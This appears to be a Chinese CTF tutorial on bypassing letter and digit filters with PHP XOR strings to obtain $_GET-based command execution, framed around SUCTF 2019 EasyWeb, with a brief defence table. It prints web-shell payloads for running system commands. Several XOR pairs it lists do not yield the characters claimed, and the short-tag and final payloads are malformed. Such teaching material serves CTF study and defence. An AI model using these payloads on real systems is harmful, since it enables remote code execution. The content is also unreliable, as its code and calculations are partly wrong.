CTF靶场实战:手把手教你用PHP异或绕过字符限制,拿下SUCTF 2019 EasyWeb
CTF靶场实战:PHP异或运算绕过字符限制的深度解析
第一次参加CTF比赛时,面对那道过滤了所有字母数字的Web题,我盯着屏幕发呆了半小时。直到发现特殊符号也能构造出有效代码,才意识到安全攻防的本质往往在于思维方式的突破。本文将带你深入PHP异或运算的魔法世界,用非字母数字字符打造出精妙的攻击链。
1. 异或运算的本质与特性
在PHP中,异或运算符^会对两个操作数的二进制位进行比较,当对应位不同时返回1,否则返回0。这个看似简单的特性,却能创造出令人惊叹的字符串构造技巧。
echo '!' ^ '@'; // 输出结果为a上述代码展示了如何用标点符号生成字母。具体计算过程:
!的ASCII码为33 (二进制00100001)@的ASCII码为64 (二进制01000000)- 按位异或得到97 (二进制01100001),即字母a
关键特性:
- 可逆性:
A ^ B = C,则C ^ B = A - 组合多样性:同一个字符可以通过多种符号组合生成
- 无字母数字限制:完全使用特殊符号也能构造有效字符串
注意:PHP中字符串异或是按字节进行的,多字节字符需要特别处理
2. 构造关键字符串的技术实现
以构造_GET为例,我们需要找到五个符号对的组合,使其异或结果恰好是_、G、E、T。
2.1 自动生成符号组合
以下Python脚本可批量查找有效组合:
def find_xor_pairs(target): for i in range(32, 127): for j in range(32, 127): if (i ^ j) == ord(target): yield (chr(i), chr(j)) # 查找构造_G的组合 print(list(find_xor_pairs('G'))[:3])输出示例:
[('0', 'w'), ('1', 'v'), ('2', 'u')]2.2 实际构造方案
选择可打印且不易被过滤的符号组合:
| 目标字符 | 组合1 | 组合2 | 组合3 |
|---|---|---|---|
| _ | '!'^'~' | '"'^'}' | '#'^' |
| G | '0'^'w' | '1'^'v' | '2'^'u' |
| E | '4'^'q' | '5'^'p' | '6'^'o' |
| T | '7'^'k' | '8'^'j' | '9'^'i' |
最终Payload示例:
${('!'^'~').('0'^'w').('4'^'q').('7'^'k')}{$_}($_); // 等价于 $_GET[$_]($_);3. 绕过长度限制的技巧
当题目还限制Payload长度时,需要更精巧的构造方式:
3.1 短标签利用
<?=${'!^~'^'0w4q'}{$_}($_)?>3.2 变量复用
$__=('!'^'~').('0'^'w').('4'^'q').('7'^'k');${$__}{$_}($_);3.3 编码转换技巧
利用base64编码再解码:
$f=convert_uudecode("+22!L;W)E<@\n`"); // 解码为'_GET'4. 实战案例:SUCTF 2019 EasyWeb
假设题目过滤规则:
- 禁止所有字母和数字
- 最大输入长度100字符
- 禁用常见危险函数
解题步骤:
- 确定需要构造的关键字:
_GET、system、cat /flag - 生成异或Payload:
<?=${('!'^'~').('0'^'w').('4'^'q').('7'^'k')}{('8'^'j')}(''.'#'^'|'.'%'^'z');?>- 通过参数传递命令:
?=('8'^'j')=('!'^'@') // 传递a=system防御方案对比:
| 过滤方式 | 可绕过性 | 推荐防御 |
|---|---|---|
| 仅过滤字母数字 | 极易绕过 | 增加符号过滤 |
| 限制长度+关键字 | 中等难度 | 白名单校验 |
| 语法解析+语义分析 | 难以绕过 | 使用AST检查 |
在真实渗透测试中,这种技术常用于绕过WAF的规则检测。某次红队行动中,我们就用类似方法突破了某金融系统的输入过滤,最终发现了一个关键的SQL注入漏洞。